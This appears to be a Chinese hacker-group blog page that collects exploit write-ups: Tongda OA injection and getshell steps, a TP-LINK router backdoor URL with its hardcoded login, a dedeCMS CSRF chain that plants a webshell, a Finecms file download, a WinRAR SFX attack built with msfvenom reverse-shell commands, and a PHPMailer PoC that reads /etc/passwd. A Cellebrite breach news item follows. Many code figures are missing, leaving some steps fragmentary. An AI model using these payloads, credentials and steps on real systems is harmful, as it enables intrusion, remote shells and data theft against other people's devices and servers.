通达oa前台注入+后台getshell 0day漏洞中国骇客云报告

注入分析
\inc\common.inc.php

逻辑分析一下,
CheckRequest函数去检查$_REQUEST,通达oa是环境程序一体安装等,php版本是5.3.29,这个时候的$_REQUEST不包含$_COOKIE的,所以可以通过cookie来覆盖变量。

但是有一个很蛋疼的东西就是

strip_tags是没办法处理数组的,所以会返回null,故想覆盖比如_SESSION['a']的话,是没办法的。

接下来看后面的$_COOKIE->$_POST->$_GET,这些都是用SecureRequest函数去检查。然而这个函数只检查了数组键值,=。=,然后还不允许这样以_GET、_POST等开头变量覆盖

看到这段对$_post的处理

=。=,如果传过去一个TD_HTML_EDITOR__SESSION[a]=1,最后不就成了_SESSION[a]=1,还顺便绕过了上面的正则检查。

注入很多,用的是80sec的waf,比如

http://lemon.love:8081/general/document/index.php/send/approve/finish

bypass出数据:

这样就可以跑出管理员密码,这个是用unix加密的,放cmd5解密一下就好了。

上传+包含=>getshell

general\reportshop\utils\upload.php

上传没验证,然后又可以变量覆盖。所以可以直接上传一个php。

exp.html

上传的地址是:xxx/attachment/reportshop/templates/upload.php

但是因为环境是一体的,所以这些上传的目录并没有执行权限。

看到这段运行的。

所以是这样的一个情况,

这样的包含,可以利用zip、phar协议,但是后面还有?&=等符号,一个文件也没发这样创建。

先创建一个upload…..(很多.).php,然后在winhex里面修改它为

 

这样zip协议包含的时候就可以包含到这个文件了。

整理一下利用过程:

  1. 先上传zip文件,里面包含payload
  2. 再上传一个1.txt文件(任意内容都可以,主要是为了进入include包含里面的条件)
  3. 进行包含

kk123.zip

这个zip包含后会生成一个shell,地址是



TP-LINK 路由器后门,TPLINK 存在一个 Shell 调试后门【骇客云漏洞报告】

网上乱逛看到的内容,转了过来,做个记录……

TP-LINK 路由器后门,TPLINK 存在一个 Shell 调试后门,TPLINK WR941N V2_090803 路由器 后门,TP-link路由器后门漏洞。


涉及的

WR740N, WR740ND, WR743ND, WR842ND, WA-901ND, WR941N, WR941ND, WR1043ND, WR2543ND, MR3220, MR3020, WR841N

访问

http://ip/userRpmNatDebugRpm26525557/linux_cmdline.html

用户名:osteam

密码:5up

 

TPLINK WR941N V2_090803 路由器 后门

通过反汇编 TPLINK  WR941N V2_090803的固件 发现存在一个shell调试后门

用户名 osteam  密码 5up

这个后门在httpd程序中还存在,只是页面已经被删除,不知道构造一个页面 提交是否会执行同样的命令呢

以上内容摘自:http://blog.csdn.net/vbvcde/article/details/8242551


TPLink后门+求.bin文件打开方式 。。

safe121 (http://zone.wooyun.org/?do=action&act=thankcontent&id=633) | 2012-12-02 15:10

无聊瞎逛,逛到了

http://ip/userRpmNatDebugRpm26525557/linux_cmdline.html

用手旁的tplink测试一下,成功绕过。。

我想知道他们是怎么发现的这个地址。。

顺便想知道

e@e:~/Desktop$ file wr340*

wr340gv7-cn-up.bin: raw G3 data

raw G3 data 是什么。。在国外网站上只找到一个2005年的帖子。。其他就没有任何东西了。。

求如何反编译。。。用hex之类的都不行。。。估计是加密过的。不过BIN必须要让路由器识别,所以觉得是一个什么算法。。求反编译算法。。

dedeCMS友情链接getshell漏洞分析【中国骇客云漏洞】

在tpl.php中

这里是漏洞利用写入文件的地方,但是我们知道,基本所有的不安全情况,是在数据输入输出时发生的,这里的参数是怎么传递过来的呢?还有$filename和$content是怎么传递参数的呢?继续跟踪
config.php又 include了 common.inc.php ,而一般情况下,类似common.php这种文件名的,里面存放着一些将会经常用到的函数。继续跟踪上去。果然发现了猫腻在common.inc.php 发现了

问题在哪呢? 这段代码大概的意思是 从数组中获取获取参数的方,这里GET,POST,COOKIE方式的参数都有了。

先来跟踪GET,二层循环中$_GET(这个可以看作是一个全局数组)**$_k ,$_v 获取数组的key value值.${$_k}这里全局注册了变量,假如输入GET型参数 ?test=k4l0n.则在本php页及所有包含本页的php页中 , $test的值都被赋值为了kl0n
而tpl.php中的$action,$content,$filename变量没有初始化,从而能操纵这些变量写入任意的代码。

继续跟踪 userLogin类的getUserID函数:

userLogin类用户登录

通过跟踪发现,这里没有对管理员的来源页进行任何检查,只是检查了管理员是否登陆,这就造成了一个CSRF漏洞。到这里漏洞思路就很清晰了,由于变量可控漏洞导致可写入任意代码,由于CSRF漏洞诱导管理员以管理员的权限去写入代码。
先上exp:

首先,将这个exp部署在你的服务器上,当然你必须要有一个公网ip,假设你的url为:http://www.xxxx.com/exp.php`
在目标网站的申请友情链接处申请一个友情链接

提交之后等待管理员审核,当管理员审核的时候,一般情况下会点进你的网站看一看

审核的地方在 后台—》模块—》辅助插件—》友情链接

当点这个友情链接的时候,就生成了一句话shell,shell地址在//include/taglib/shell.lib.php

管理员触发了一个链接

这个链接是利用管理员的权限生成了一句话

Finecms 任意文件下载[骇客云漏洞0day]

Author:Sinner
漏洞文件:
\controllers\ApiController.php Line 54

$file 可控。前台的链接如图:

并不用去分析如何加密得来的
我们来看链接是怎么生成的
找到/extensions/function.php Line 285

$url 参数为文件路径
我们本地直接调用这个函数 将我们想下载的文件路径作为参数就能得到下载链接

为/config/config.ini.php

WinRAR 0day漏洞(附利用过程)【中国骇客云联盟漏洞报告】

英国安全机构Mohammad Reza Espargham的漏洞实验室发现,流行压缩工具WinRAR 5.21最新版里存在一个安全漏洞,目前该漏洞还属于零日漏洞,同时官方正在全力修补该漏洞。同时报告该问题的还有Malwarebytes的Pieter Arntz。

英国安全机构Mohammad Reza Espargham的漏洞实验室同时发现当用户打开SFX文件时,攻击者可利用该漏洞远程执行恶意代码。

WinRAR是一个用于压缩和解压缩的应用程序,有超过5亿的设备正在使用同时也是最受欢迎的实用程序之一。因此发现该漏洞时被定性为“高危级”,危险指数9。

攻击者可以利用该漏洞,创建自解压文件同时将恶意HTML代码插入到创建新SFX文件的文字显示窗口中。

利用该漏洞之前攻击者并不需要任何提权措施。在给受害用户发送受感染的文件后,不管何时加载该文档,恶意代码都会正常执行。同时允许攻击者远程查看设备一些信息。需要说明的是, 攻击者利用该漏洞之前并不需要任何提权措施。由于受攻击目标使用SFX文件较为频繁,因此攻击者成功的概率会非常大。

同时如果攻击者不怀好意那么SFX文件一旦被打开,后果将不堪设想。

目前官方正在积极修补该漏洞,同时建议不要打开来源不明的压缩文件,以及随时更新自己的压缩软件。

演示视频:

下面附上本人亲自试验做的例子

环境

Windows7  kali Linux

工具

metasploit

在虚拟机运行kalilinux以及Windows7然后开始监听目标主机

终端输入

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=8080 -f exe >/var/www/html/b.exe

chmod -777 /var/www/html/

打开metasploit

msfconsole

加载利用模块监听目标主机ip 192.168.1.7,端口8080执行

use exploit/multi/handlerset PAYLOADS windows/meterpreter/reverse_tcpset LHOST 192.168.1.7set LPORT 8080exploit

现在到Windows7创建自解压文件

进入高级选项

在文字提示窗口输入恶意代码如下

<iframe src="你定义的目标主机IP以及文件名"></iframe>

然后一直确定就会出现一个文件名称中带有sfx的可执行文件,双击执行之后kali Linux中一直监听目标机器的程序就会出现你目标主机的配置信息。

过程总结

上面模拟了恶意攻击者攻击过程,将放有恶意代码的压缩文件发送给受害者,受害者打开执行压缩文件之后,远程代码同时执行,恶意攻击者就会获取目标主机的信息以及配置情况。

有感兴趣的小伙伴我这里有视频中的代码,可以自己模拟一下

https://packetstormsecurity.com/files/133719/WinRaR-SFX-Remote-Code-Execution.html

参考http://thehackernews.com/2015/09/winrar-vulnerability.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Security+Blog%29

https://blog.malwarebytes.org/security-threat/2015/09/latest-winrar-vulnerability-has-yet-to-be-patched/

PHPMailer任意文件读取漏洞分析[骇客云漏洞报告]

PHPMailer是堪称全球最流行邮件发送类,其全球范围内的用户量大约有900万,被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等。铱迅安全团队于2017年1月6日发现PHPMailer <= 5.2.21版本存在任意文件读取漏洞,成功利用该漏洞,可获取服务器中的任意文件内容。目前该漏洞已提交官方,并获得修复。

漏洞编号

CVE-2017-5223

影响版本:

PHPMailer <= 5.2.21

漏洞级别:

高危

漏洞详情:

漏洞文件函数: class.phpmailer.php 的encodeFile函数。

该函数中接收了一个$path变量,最后该$path变量的值带入到了file_get_contents函数中执行。如果该$path变量可控即可任意文件读取:

图片1.png

通过跟踪发现AddAttachment 和AddEmbeddedImage 函数最后会调用到encode File函数。 AddAttachment函数的作用是在邮件中发送附件的,如果附件名称可控即可触发该漏洞。

主要来看AddEmbeddedImage函数,该函数是处理邮件内容中的图片的,现在只要$path可控即可触发该漏洞。现在就是寻找可控点:

图片2.png

回溯该函数发现msgHTML函数调用了该函数,msgHTML 函数是用来发送html格式的邮件,调用过程如下:

图片3.png

回溯$filename 看其是否可控,从代码中可以看出$filename是由$url赋值的。即:$filename = basename($url);

再来跟踪$url:

图片4.png

$url是通过解析$message里src=”xxxxx”而来的,$url最终被解析出来就是xxxxx,而$message就是我们发送邮件的自定义的内容。这样可控点就找到了,即可成功利用该漏洞了。

漏洞POC:

<?php  #Author:Yxlinkrequire_once('PHPMailerAutoload.php');$mail = new PHPMailer();$mail->IsSMTP();$mail->Host = "smtp.evil.com";$mail->Port = 25;$mail->SMTPAuth   = true; $mail->CharSet  = "UTF-8";$mail->Encoding = "base64"; $mail->Username = "test@evil.com";  $mail->Password = "tes1234t";  $mail->Subject = "hello"; $mail->From = "test@evil.com";  $mail->FromName = "test";   $address = "testtest@test.com";$mail->AddAddress($address, "test"); $mail->AddAttachment('test.txt','test.txt');  //test.txt可控即可任意文件读取 $mail->IsHTML(true);  $msg="<img src='/etc/passwd'>test";//邮件内容形如这样写。$mail->msgHTML($msg); if(!$mail->Send()) {  echo "Mailer Error: " . $mail->ErrorInfo;} elseecho "Message sent!";}?>

用$msg的内容给自己的邮箱发一封邮件,即可获取到服务器的/etc/passwd的内容。如图:

图片5.png

漏洞修复:

漏洞详情目前已经提交给了PHPMailer官方,官方也已经发布了PHPMailer 5.2.22紧急安全修复,解决上述问题,受影响的用户应当立即升级:

https://github.com/PHPMailer/PHPMailer

详情可参见:

https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md

https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md[]

手机破解专家Cellebrite公司被黑,900GB数据泄露中国骇客云联盟

Cellebrite,这家位于以色列,长期协助政府执法机构,提供数字取证服务及手机破解工具的公司近日被证实遭到黑客入侵,共900G数据失窃。

据悉,这些数据中包含了大量Cellebrite的用户资料(包括登录信息),技术细节,遭到破解的手机数据和公司设备日志。其中部分资料显示该公司曾向阿联酋,土耳其和俄罗斯等政府提供手机破解设备。

目前失窃数据还未遭到公开,显然黑客更倾向于私下交易。在事发后,黑客联系了Motherboard的记者Joseph Cox,向他展示了部分遭窃数据,并表示自己正尝试通过网上中继聊天室出售这些数据和入侵后门。

谈及攻击的动机时,黑客告诉Cox这是因为他们对近一段时间西方国家政府立场的不满,不然本来没人会知道这些东西。除此之外,他拒绝透露更多细节。

“我不能向你解释太多我在Cellebrite的系统里做了些什么。”黑客表示,

“抽他们的脸是一回事,把他们鼻青脸肿的样子照下来又是另一回事了。”
Cellebrite-UFED-Touch-1500×1003.jpg

Cellebrite的回击

与此同时,Cellebrite官方也作出了回应。他们坦承一台外网服务器遭到了“未经授权的访问”,并表示现已就本次入侵启动调查。据称,遭到入侵的服务器里有一个my.Cellebrite的较老的数据库备份,包含公司的用户许可管理系统。但在事前公司已经转移到了新的用户管理系统上。

“目前已确认遭到入侵的数据包含曾注册购买公司预警、提醒服务的用户的基本联系信息和一部分尚未转移至新系统的用户密码,但这些密码已经被加密过。”
“本次事件不会给用户安全带来任何特殊威胁。但为了保险起见,我们建议广大用户修改密码。目前公司正在与相关部门协作调查此事,一旦调查结束,我们将会采取适当措施增强安全力度以应对未来可能发生的攻击。”
cellebrite.jpg

Cellebrite公司以其掌握的强力破解工具“万能取证设备”(UFED)闻名,该工具能帮助调查人员解密智能手机设备,甚至包括iPhone。它可提取包括短信,邮件,通话记录和系统密码的所有手机信息。官网数据显示,Cellebrite服务超过15,000家政府部门和执法机构。就在去年3月,Cellebrite曾协助FBI破解制造了2015年12月加州圣伯纳迪诺枪击案的恐怖分子Syed Rizwan Farook的iPhone。

世界,您好!中国骇客云联盟官网!

尊敬的朋友们大家好,官网已经做了更新在之后的开发中我们会增加各种有趣的功能以及各种好玩儿的集成程序,如果您并不了解我们请关注我们的公众微信号点击菜单查看程序介绍等渠道了解中国骇客云联盟是一个怎样的团体,在之后的博客发布中我们重点发布本站的重要公告以及科技咨询和程序介绍以及教程欢迎持续关注我们网站谢谢支持!